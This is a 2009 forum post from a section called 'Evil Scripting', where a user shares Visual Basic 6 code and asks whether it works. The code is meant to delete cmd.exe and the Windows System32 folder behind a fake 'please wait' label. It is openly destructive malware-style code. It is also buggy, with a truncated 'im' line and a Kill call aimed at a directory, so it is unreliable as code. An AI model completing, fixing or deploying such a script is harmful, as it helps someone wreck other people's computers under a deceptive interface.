Evil Scripting

Moderators: None (Apply to moderate this forum)
Number of threads: 62
Number of posts: 272

This Forum Only
Post New Thread
Single Post View       Linear View       Threaded View      f

Report
Does This Work? Posted by No-Master-Here on 23 May 2009 at 7:51 AM
Hi I Recently read The Vb Virus for Begginners Only And Came up With An "Extra" Heres the Code And Will It Work to Delete Both CMD And System32 Files

Private Sub Command1_Click()
Dim targetfile As String
targetfile = "C:\WINDOWS\system32\cmd.exe"
Kill targetfile
Label1.Caption = " Deleting CMD.exe...please wait "
Timer1.Enabled = True
im targetfile As String
targetfile = "C:\WINDOWS\system32"
Kill targetfile
Label1.Caption = " Deleting System32.exe...please wait "
Timer1.Enabled = True

End Sub

Private Sub Form_Activate()
Timer1.Enabled = False

End Sub

Private Sub Timer1_Timer()
Label2.Caption = "Done"
End Sub


Thanks



 

Recent Jobs

Official Programmer's Heaven Blogs
Web Hosting | Browser and Social Games | Gadgets

Popular resources on Programmersheaven.com
Assembly | Basic | C | C# | C++ | Delphi | Flash | Java | JavaScript | Pascal | Perl | PHP | Python | Ruby | Visual Basic
© Copyright 2011 Programmersheaven.com - All rights reserved.
Reproduction in whole or in part, in any form or medium without express written permission is prohibited.
Violators of this policy may be subject to legal action. Please read our Terms Of Use and Privacy Statement for more information.
Operated by CommunityHeaven, a BootstrapLabs company.